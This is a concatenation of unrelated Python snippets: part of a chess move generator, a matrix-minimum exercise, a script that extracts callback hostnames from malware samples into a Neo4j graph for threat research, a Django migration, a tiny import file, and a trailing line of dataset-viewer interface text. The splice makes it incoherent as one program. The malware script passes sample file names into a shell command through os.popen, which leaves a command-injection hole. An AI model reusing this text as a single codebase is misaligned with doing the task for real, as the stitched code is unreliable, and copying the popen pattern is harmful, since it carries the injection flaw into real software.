searching2 = False
if searching3:
if pos[0] + count > 7 or pos[1] + count > 7:
searching3 = False
else:
if board[pos[0] + count][pos[1] + count] == None:
possibleMoves.append([pos[0] + count, pos[1] + count])
else:
if board[pos[0] + count][pos[1] + count].colour != colour:
possibleMoves.append([pos[0] + count, pos[1] + count])
searching3 = False
if searching4:
if pos[0] + count > 7 or pos[1] - count < 0:
searching4 = False
else:
if board[pos[0] + count][pos[1] - count] == None:
possibleMoves.append([pos[0] + count, pos[1] - count])
else:
if board[pos[0] + count][pos[1] - count].colour != colour:
possibleMoves.append([pos[0] + count, pos[1] - count])
searching4 = False
count += 1
return possibleMoves
def getKnightMoves(pos, board, colour):
possibleMoves = []
allRelativeMoves = [[-2,1], [-1,2], [1,2], [2,1], [2,-1], [1, -2], [-1, -2], [-2, -1]]
for relativeMove in allRelativeMoves:
newProposedPos = [pos[0] + relativeMove[0], pos[1] + relativeMove[1]]
if not(newProposedPos[0] < 0 or newProposedPos[0] > 7 or newProposedPos[1] < 0 or newProposedPos[1] > 7):
if board[newProposedPos[0]][newProposedPos[1]] == None:
possibleMoves.append(newProposedPos)
else:
if board[newProposedPos[0]][newProposedPos[1]].colour != colour:
possibleMoves.append(newProposedPos)
return possibleMoves
def getKingMoves(pos, board, colour, moveNo):
possibleMoves = []
allRelativeMoves = [[-1,0], [-1,1], [0,1], [1,1], [1,0], [1,-1], [0,-1], [-1,-1]]
if moveNo == 0:
allRelativeMoves.append([0,-2])
for relativeMove in allRelativeMoves:
newProposedPos = [pos[0] + relativeMove[0], pos[1] + relativeMove[1]]
if not(newProposedPos[0] < 0 or newProposedPos[0] > 7 or newProposedPos[1] < 0 or newProposedPos[1] > 7):
if board[newProposedPos[0]][newProposedPos[1]] == None:
possibleMoves.append(newProposedPos)
else:
if board[newProposedPos[0]][newProposedPos[1]].colour != colour:
possibleMoves.append(newProposedPos)
allRelativeMoves = [[-1,0], [-1,1], [0,1], [1,1], [1,0], [1,-1], [0,-1], [-1,-1]]
return possibleMoves
def checkAllMoves(board, colour):
allMoves = []
for line in board:
for piece in line:
if piece != None:
if piece.colour != colour:
if piece.getName()[1] == "k":
pieceMoves = getKingMoves(piece.pos, board, piece.colour, piece.moveNo)
else:
pieceMoves = piece.getMoves(board)
if len(pieceMoves) != 0:
for move in pieceMoves:
allMoves.append(move)
return allMoves
def removeKingTake(board, colour, moves):
position = []
for rank in board:
for piece in rank:
if piece != None:
if piece.getName()[1] == "k":
if piece.colour != colour:
position = piece.pos
if position in moves:
moves.remove(position)
return moves
|
matrix = [[1, 5, 9], [-2, 0, 13], [7, 1, 5]]
# for i in range(3):
# if i == 0:
# sm_1 = min(m[i])
# elif i == 1:
# sm_2 = min(m[i])
# else:
# sm_3 = min(m[i])
# print(min(sm_1, sm_2, sm_3))
# ##########################
"""
temp_list =[]
m = None
n = None
for row in matrix:
temp_min = min(row)
temp_list.append(temp_min)
m = temp_list.index(temp_min)
temp_min = min(temp_list)
n = temp_list.index(temp_min)
print(f"m*n: {m},{n} | smalest number is- {temp_min}")
"""
smallest = None
m, n = None, None
for m_ind, m_list in enumerate(matrix):
print("H" ,m_ind, m_list)
for n_ind, n_val in enumerate(m_list):
if smallest == None:
smallest = n_val
m, n = m_ind, n_ind
elif smallest > n_val:
smallest = n_val
m, n = m_ind, n_ind
print(smallest, m, n)
|
# The following program extracts callback domain names from malware files and then builds a bipartite network of malware samples.
# it performs one projection of the network to show which malware samples share common callback servers
# it performs another projection to show which callback servers are called by common malware samples.
#!/usr/bin/python
import pefile
import sys
import argparse
import os
import pprint
#import networkx
import re
#from networkx.drawing.nx_agraph import write_dot
import collections
#from networkx.algorithms import bipartite
from neo4j import GraphDatabase
driver = GraphDatabase.driver("bolt://localhost:7687",auth=(os.environ['neouser'],os.environ['neopassword']))
args = argparse.ArgumentParser("Visualize shared hostnames between a directory of malware samples")
args.add_argument("target_path",help="directory with malware samples")
# args.add_argument("output_file",help="file to write DOT file to")
# args.add_argument("malware_projection",help="file to write DOT file to")
# args.add_argument("hostname_projection",help="file to write DOT file to")
args = args.parse_args()
# network = networkx.Graph()
valid_hostname_suffixes = map(lambda string: string.strip(), open("/home/president_techknights/project/malware_data_science/ch4/code/domain_suffixes.txt"))
valid_hostname_suffixes = set(valid_hostname_suffixes)
def find_hostnames(string):
possible_hostnames = re.findall(r'(?:[a-zA-Z0-9](?:[a-zA-Z0-9\-]{,61}[a-zA-Z0-9])?\.)+[a-zA-Z]{2,6}', string)
valid_hostnames = filter(lambda hostname: hostname.split(".")[-1].lower() in valid_hostname_suffixes, possible_hostnames)
return valid_hostnames
def create_nodem(n):
with driver.session() as session:
# session.run("CREATE (n:{0})".format(name) + " /{ label: $label /}", label=label)
session.run("MERGE (a:malware {name: $n , type: 'malware'}) ", n=n )
# maybe we can edit property and add type as malware
# ("MERGE (a:Person {name: $name}) "
# "MERGE (a)-[:KNOWS]->(friend:Person {name: $friend_name})",
# name=name, friend_name=friend_name)
def create_nodeh(n):
with driver.session() as session:
# session.run("CREATE (n:{0})".format(name) + " /{ label: $label /}", label=label)
session.run("MERGE (b:host {name: $n , type: 'host'})", n=n )
def create_edge(node1,node2):
with driver.session() as session:
# session.run("CREATE (n.`{0}`)<-[:HOST]-(n.`{1}`)".format(node1,node2) )
session.run("MATCH (a), (b) WHERE a.name = $node1 AND b.name = $node2 "
"CREATE (a)<-[:HOST]-(b)", node1=node1, node2=node2 )
# search the target directory for valid Windows PE executable files
for root,dirs,files in os.walk(args.target_path):
for path in files:
# try opening the file with pefile to see if it's really a PE file
try:
pe = pefile.PE(os.path.join(root,path))
except pefile.PEFormatError:
continue
fullpath = os.path.join(root,path)
# extract printable strings from the target sample
strings = os.popen("strings '{0}'".format(fullpath)).read()
# use the search_doc function in the included reg module to find hostnames
hostnames = find_hostnames(strings)
# print(hostnames)
# if len(hostnames):
# # add the nodes and edges for the bipartite network
# # network.add_node(path,label=path[:32],color='black',penwidth=5,bipartite=0)
# # malware nodes
# # CREATE (n:path {name: path[:32]})
path=path.replace('-','_')
create_nodem(path[:32])
for hostname in hostnames:
# print(hostname)
# # network.add_node(hostname,label=hostname,color='blue', penwidth=10,bipartite=1)
# # hostname nodes
# # CREATE (n:hostname {name: hostname})
hostname=hostname.replace('.','_')
hostname=hostname.replace('-','_')
hostname= '_'+hostname
create_nodeh(hostname)
# # network.add_edge(hostname,path,penwidth=2)
# # relationship between hostname and malware
# # CREATE (n:path)<-[:HOST]-(n:hostname)
# try:
create_edge(path[:32], hostname)
#except:
# print("couldn't create edge {} - {}".format(path[:32],hostname))
if hostnames:
print ("Extracted hostnames from:",path)
# pprint.pprint(hostnames)
# write the dot file to disk
# write_dot(network, args.output_file)
# malware = set(n for n,d in network.nodes(data=True) if d['bipartite']==0)
# hostname = set(network)-malware
# # use NetworkX's bipartite network projection function to produce the malware
# # and hostname projections
# malware_network = bipartite.projected_graph(network, malware)
# hostname_network = bipartite.projected_graph(network, hostname)
# # write the projected networks to disk as specified by the user
# write_dot(malware_network,args.malware_projection)
# write_dot(hostname_network,args.hostname_projection)
|
# Generated by Django 3.2.3 on 2021-06-02 13:57
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = [
("images", "0008_auto_20210602_1557"),
]
operations = [
migrations.CreateModel(
name="ExpiringUrl",
fields=[
(
"id",
models.BigAutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("uuid", models.UUIDField(default=uuid.uuid4)),
("created_at", models.DateTimeField()),
("expires_at", models.DateTimeField()),
(
"image",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE, to="images.image"
),
),
],
),
]
|
import module2
owner = 'module1'
module2.show_owner(owner)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.